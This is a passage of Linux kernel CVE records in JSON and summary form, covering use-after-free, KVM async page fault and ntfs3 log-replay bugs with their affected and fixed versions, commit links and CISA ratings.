  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42128",
    "datePublished": "2024-07-30T07:46:24.751Z",
    "dateReserved": "2024-07-29T15:50:41.185Z",
    "dateUpdated": "2025-07-28T11:16:38.410Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-48791 (GCVE-0-2022-48791)

Vulnerability from cvelistv5 – Published: 2024-07-16 11:43 – Updated: 2025-12-23 13:20

Title

scsi: pm8001: Fix use-after-free for aborted TMF sas_task

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: pm8001: Fix use-after-free for aborted TMF sas_task Currently a use-after-free may occur if a TMF sas_task is aborted before we handle the IO completion in mpi_ssp_completion(). The abort occurs due to timeout. When the timeout occurs, the SAS_TASK_STATE_ABORTED flag is set and the sas_task is freed in pm8001_exec_internal_tmf_task(). However, if the I/O completion occurs later, the I/O completion still thinks that the sas_task is available. Fix this by clearing the ccb->task if the TMF times out - the I/O completion handler does nothing if this pointer is cleared.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d872e7b5fe38f325f…
	https://git.kernel.org/stable/c/3c334cdfd94945b8e…
	https://git.kernel.org/stable/c/510b21442c3a2e3ec…
	https://git.kernel.org/stable/c/61f162aa4381845ac…

Impacted products

Vendor

Product

Version

Linux

Affected: 968ee9176a4489ce6d5ee54ff88dadfbff9b95f4 , < d872e7b5fe38f325f5206b6872746fa02c2b4819 (git)
Affected: d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1 , < 3c334cdfd94945b8edb94022a0371a8665b17366 (git)
Affected: d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1 , < 510b21442c3a2e3ecc071ba3e666b320e7acdd61 (git)
Affected: d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1 , < 61f162aa4381845acbdc7f2be4dfb694d027c018 (git)
Affected: fa3c19ceaa8b4b7c29d710c2c407df57d256a6c5 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.10.102 , ≤ 5.10.* (semver)
Unaffected: 5.15.25 , ≤ 5.15.* (semver)
Unaffected: 5.16.11 , ≤ 5.16.* (semver)
Unaffected: 5.17 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T15:25:00.417Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d872e7b5fe38f325f5206b6872746fa02c2b4819"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c334cdfd94945b8edb94022a0371a8665b17366"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/510b21442c3a2e3ecc071ba3e666b320e7acdd61"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61f162aa4381845acbdc7f2be4dfb694d027c018"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-48791",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:59:35.678672Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:15.736Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/pm8001/pm8001_sas.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d872e7b5fe38f325f5206b6872746fa02c2b4819",
              "status": "affected",
              "version": "968ee9176a4489ce6d5ee54ff88dadfbff9b95f4",
              "versionType": "git"
            },
            {
              "lessThan": "3c334cdfd94945b8edb94022a0371a8665b17366",
              "status": "affected",
              "version": "d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1",
              "versionType": "git"
            },
            {
              "lessThan": "510b21442c3a2e3ecc071ba3e666b320e7acdd61",
              "status": "affected",
              "version": "d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1",
              "versionType": "git"
            },
            {
              "lessThan": "61f162aa4381845acbdc7f2be4dfb694d027c018",
              "status": "affected",
              "version": "d712d3fb484b7fa8d1d57e9ca6f134bb9d8c18b1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "fa3c19ceaa8b4b7c29d710c2c407df57d256a6c5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/pm8001/pm8001_sas.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.102",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.25",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.16.*",
              "status": "unaffected",
              "version": "5.16.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.17",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.102",
                  "versionStartIncluding": "5.10.61",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.25",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16.11",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.17",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.13.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: pm8001: Fix use-after-free for aborted TMF sas_task\n\nCurrently a use-after-free may occur if a TMF sas_task is aborted before we\nhandle the IO completion in mpi_ssp_completion(). The abort occurs due to\ntimeout.\n\nWhen the timeout occurs, the SAS_TASK_STATE_ABORTED flag is set and the\nsas_task is freed in pm8001_exec_internal_tmf_task().\n\nHowever, if the I/O completion occurs later, the I/O completion still\nthinks that the sas_task is available. Fix this by clearing the ccb-\u003etask\nif the TMF times out - the I/O completion handler does nothing if this\npointer is cleared."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T13:20:29.145Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d872e7b5fe38f325f5206b6872746fa02c2b4819"
        },
        {
          "url": "https://git.kernel.org/stable/c/3c334cdfd94945b8edb94022a0371a8665b17366"
        },
        {
          "url": "https://git.kernel.org/stable/c/510b21442c3a2e3ecc071ba3e666b320e7acdd61"
        },
        {
          "url": "https://git.kernel.org/stable/c/61f162aa4381845acbdc7f2be4dfb694d027c018"
        }
      ],
      "title": "scsi: pm8001: Fix use-after-free for aborted TMF sas_task",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2022-48791",
    "datePublished": "2024-07-16T11:43:47.211Z",
    "dateReserved": "2024-07-16T11:38:08.893Z",
    "dateUpdated": "2025-12-23T13:20:29.145Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-48943 (GCVE-0-2022-48943)

Vulnerability from cvelistv5 – Published: 2024-08-22 03:30 – Updated: 2025-12-23 13:21

Title

KVM: x86/mmu: make apf token non-zero to fix bug

Summary

In the Linux kernel, the following vulnerability has been resolved: KVM: x86/mmu: make apf token non-zero to fix bug In current async pagefault logic, when a page is ready, KVM relies on kvm_arch_can_dequeue_async_page_present() to determine whether to deliver a READY event to the Guest. This function test token value of struct kvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a READY event is finished by Guest. If value is zero meaning that a READY event is done, so the KVM can deliver another. But the kvm_arch_setup_async_pf() may produce a valid token with zero value, which is confused with previous mention and may lead the loss of this READY event. This bug may cause task blocked forever in Guest: INFO: task stress:7532 blocked for more than 1254 seconds. Not tainted 5.10.0 #16 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:stress state:D stack: 0 pid: 7532 ppid: 1409 flags:0x00000080 Call Trace: __schedule+0x1e7/0x650 schedule+0x46/0xb0 kvm_async_pf_task_wait_schedule+0xad/0xe0 ? exit_to_user_mode_prepare+0x60/0x70 __kvm_handle_async_pf+0x4f/0xb0 ? asm_exc_page_fault+0x8/0x30 exc_page_fault+0x6f/0x110 ? asm_exc_page_fault+0x8/0x30 asm_exc_page_fault+0x1e/0x30 RIP: 0033:0x402d00 RSP: 002b:00007ffd31912500 EFLAGS: 00010206 RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0 RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0 RBP: 00000000021262b0 R08: 0000000000000003 R09: 0000000000000086 R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000 R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/72fdfc75d4217b323…
	https://git.kernel.org/stable/c/4c3644b6c96c5daa5…
	https://git.kernel.org/stable/c/62040f5cd7d937de5…
	https://git.kernel.org/stable/c/6f3c1fc53d86d580d…

Impacted products

Vendor

Product

Version

Linux

Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 72fdfc75d4217b32363cc80def3de2cb3fef3f02 (git)
Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 4c3644b6c96c5daa5149e5abddc07234eea47c7c (git)
Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 62040f5cd7d937de547836e747b6aa8212fec573 (git)
Affected: 2635b5c4a0e407b84f68e188c719f28ba0e9ae1b , < 6f3c1fc53d86d580d8d6d749c4af23705e4f6f79 (git)

Linux

Affected: 5.8
Unaffected: 0 , < 5.8 (semver)
Unaffected: 5.10.103 , ≤ 5.10.* (semver)
Unaffected: 5.15.26 , ≤ 5.15.* (semver)
Unaffected: 5.16.12 , ≤ 5.16.* (semver)
Unaffected: 5.17 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-48943",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:33:08.943998Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:10.679Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/mmu/mmu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "72fdfc75d4217b32363cc80def3de2cb3fef3f02",
              "status": "affected",
              "version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
              "versionType": "git"
            },
            {
              "lessThan": "4c3644b6c96c5daa5149e5abddc07234eea47c7c",
              "status": "affected",
              "version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
              "versionType": "git"
            },
            {
              "lessThan": "62040f5cd7d937de547836e747b6aa8212fec573",
              "status": "affected",
              "version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
              "versionType": "git"
            },
            {
              "lessThan": "6f3c1fc53d86d580d8d6d749c4af23705e4f6f79",
              "status": "affected",
              "version": "2635b5c4a0e407b84f68e188c719f28ba0e9ae1b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kvm/mmu/mmu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.8"
            },
            {
              "lessThan": "5.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.16.*",
              "status": "unaffected",
              "version": "5.16.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.17",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.103",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.26",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16.12",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.17",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/mmu: make apf token non-zero to fix bug\n\nIn current async pagefault logic, when a page is ready, KVM relies on\nkvm_arch_can_dequeue_async_page_present() to determine whether to deliver\na READY event to the Guest. This function test token value of struct\nkvm_vcpu_pv_apf_data, which must be reset to zero by Guest kernel when a\nREADY event is finished by Guest. If value is zero meaning that a READY\nevent is done, so the KVM can deliver another.\nBut the kvm_arch_setup_async_pf() may produce a valid token with zero\nvalue, which is confused with previous mention and may lead the loss of\nthis READY event.\n\nThis bug may cause task blocked forever in Guest:\n INFO: task stress:7532 blocked for more than 1254 seconds.\n       Not tainted 5.10.0 #16\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:stress          state:D stack:    0 pid: 7532 ppid:  1409\n flags:0x00000080\n Call Trace:\n  __schedule+0x1e7/0x650\n  schedule+0x46/0xb0\n  kvm_async_pf_task_wait_schedule+0xad/0xe0\n  ? exit_to_user_mode_prepare+0x60/0x70\n  __kvm_handle_async_pf+0x4f/0xb0\n  ? asm_exc_page_fault+0x8/0x30\n  exc_page_fault+0x6f/0x110\n  ? asm_exc_page_fault+0x8/0x30\n  asm_exc_page_fault+0x1e/0x30\n RIP: 0033:0x402d00\n RSP: 002b:00007ffd31912500 EFLAGS: 00010206\n RAX: 0000000000071000 RBX: ffffffffffffffff RCX: 00000000021a32b0\n RDX: 000000000007d011 RSI: 000000000007d000 RDI: 00000000021262b0\n RBP: 00000000021262b0 R08: 0000000000000003 R09: 0000000000000086\n R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000\n R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T13:21:11.553Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/72fdfc75d4217b32363cc80def3de2cb3fef3f02"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c3644b6c96c5daa5149e5abddc07234eea47c7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/62040f5cd7d937de547836e747b6aa8212fec573"
        },
        {
          "url": "https://git.kernel.org/stable/c/6f3c1fc53d86d580d8d6d749c4af23705e4f6f79"
        }
      ],
      "title": "KVM: x86/mmu: make apf token non-zero to fix bug",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2022-48943",
    "datePublished": "2024-08-22T03:30:14.027Z",
    "dateReserved": "2024-08-22T01:27:53.623Z",
    "dateUpdated": "2025-12-23T13:21:11.553Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46757 (GCVE-0-2024-46757)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-01-09 15:47

This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "providerMetadata": {
        "dateUpdated": "2025-01-09T15:47:47.308Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "rejectedReasons": [
        {
          "lang": "en",
          "value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46757",
    "datePublished": "2024-09-18T07:12:16.843Z",
    "dateRejected": "2025-01-09T15:47:47.308Z",
    "dateReserved": "2024-09-11T15:12:18.271Z",
    "dateUpdated": "2025-01-09T15:47:47.308Z",
    "state": "REJECTED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42299 (GCVE-0-2024-42299)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:03

Title

fs/ntfs3: Update log->page_{mask,bits} if log->page_size changed

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Update log->page_{mask,bits} if log->page_size changed If an NTFS file system is mounted to another system with different PAGE_SIZE from the original system, log->page_size will change in log_replay(), but log->page_{mask,bits} don't change correspondingly. This will cause a panic because "u32 bytes = log->page_size - page_off" will get a negative value in the later read_log_page().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0484adcb5fbcadd9b…
	https://git.kernel.org/stable/c/b90ceffdc975502bc…
	https://git.kernel.org/stable/c/2cac0df3324b5e287…
	https://git.kernel.org/stable/c/0a4ae2644e2a3b3b2…
	https://git.kernel.org/stable/c/2fef55d8f78383c8e…

Impacted products

Vendor

Product

Version

Linux

Affected: b46acd6a6a627d876898e1c84d3f84902264b445 , < 0484adcb5fbcadd9ba0fd4485c42630f72e97da9 (git)
Affected: b46acd6a6a627d876898e1c84d3f84902264b445 , < b90ceffdc975502bc085ce8e79c6adeff05f9521 (git)
Affected: b46acd6a6a627d876898e1c84d3f84902264b445 , < 2cac0df3324b5e287d8020bc0708f7d2dec88a6f (git)
Affected: b46acd6a6a627d876898e1c84d3f84902264b445 , < 0a4ae2644e2a3b3b219aad9639fb2b0691d08420 (git)
Affected: b46acd6a6a627d876898e1c84d3f84902264b445 , < 2fef55d8f78383c8e6d6d4c014b9597375132696 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42299",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:10:38.451073Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:28.553Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:59.953Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/fslog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0484adcb5fbcadd9ba0fd4485c42630f72e97da9",
              "status": "affected",
              "version": "b46acd6a6a627d876898e1c84d3f84902264b445",
              "versionType": "git"
            },
            {
              "lessThan": "b90ceffdc975502bc085ce8e79c6adeff05f9521",
              "status": "affected",
              "version": "b46acd6a6a627d876898e1c84d3f84902264b445",
              "versionType": "git"
            },
            {
              "lessThan": "2cac0df3324b5e287d8020bc0708f7d2dec88a6f",
              "status": "affected",
              "version": "b46acd6a6a627d876898e1c84d3f84902264b445",
              "versionType": "git"
            },
            {
              "lessThan": "0a4ae2644e2a3b3b219aad9639fb2b0691d08420",
              "status": "affected",
              "version": "b46acd6a6a627d876898e1c84d3f84902264b445",
              "versionType": "git"
            },
            {
              "lessThan": "2fef55d8f78383c8e6d6d4c014b9597375132696",
              "status": "affected",
              "version": "b46acd6a6a627d876898e1c84d3f84902264b445",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/fslog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Update log-\u003epage_{mask,bits} if log-\u003epage_size changed\n\nIf an NTFS file system is mounted to another system with different\nPAGE_SIZE from the original system, log-\u003epage_size will change in\nlog_replay(), but log-\u003epage_{mask,bits} don\u0027t change correspondingly.\nThis will cause a panic because \"u32 bytes = log-\u003epage_size - page_off\"\nwill get a negative value in the later read_log_page()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:26:16.293Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0484adcb5fbcadd9ba0fd4485c42630f72e97da9"
        },
        {
          "url": "https://git.kernel.org/stable/c/b90ceffdc975502bc085ce8e79c6adeff05f9521"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cac0df3324b5e287d8020bc0708f7d2dec88a6f"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a4ae2644e2a3b3b219aad9639fb2b0691d08420"
        },
        {
          "url": "https://git.kernel.org/stable/c/2fef55d8f78383c8e6d6d4c014b9597375132696"
        }
      ],
      "title": "fs/ntfs3: Update log-\u003epage_{mask,bits} if log-\u003epage_size changed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42299",
    "datePublished": "2024-08-17T09:09:06.570Z",
    "dateReserved": "2024-07-30T07:40:12.270Z",
    "dateUpdated": "2025-11-03T22:03:59.953Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44998 (GCVE-0-2024-44998)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

atm: idt77252: prevent use after free in dequeue_rx()

Summary

In the Linux kernel, the following vulnerability has been resolved: atm: idt77252: prevent use after free in dequeue_rx() We can't dereference "skb" after calling vcc->push() because the skb is released.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/628ea82190a678a56…
	https://git.kernel.org/stable/c/09e086a5f72ea27c7…
	https://git.kernel.org/stable/c/1cece837e387c0392…
	https://git.kernel.org/stable/c/24cf390a5426aac92…
	https://git.kernel.org/stable/c/379a6a326514a3e2f…
	https://git.kernel.org/stable/c/ef23c18ab88e33ce0…
	https://git.kernel.org/stable/c/91b4850e7165a4b71…
	https://git.kernel.org/stable/c/a9a18e8f770c9b070…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 628ea82190a678a56d2ec38cda3addf3b3a6248d (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 09e086a5f72ea27c758b3f3b419a69000c32adc1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1cece837e387c039225f19028df255df87a97c0d (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 24cf390a5426aac9255205e9533cdd7b4235d518 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 379a6a326514a3e2f71b674091dfb0e0e7522b55 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < ef23c18ab88e33ce000d06a5c6aad0620f219bfd (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 91b4850e7165a4b7180ef1e227733bcb41ccdf10 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < a9a18e8f770c9b0703dab93580d0b02e199a4c79 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.321 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
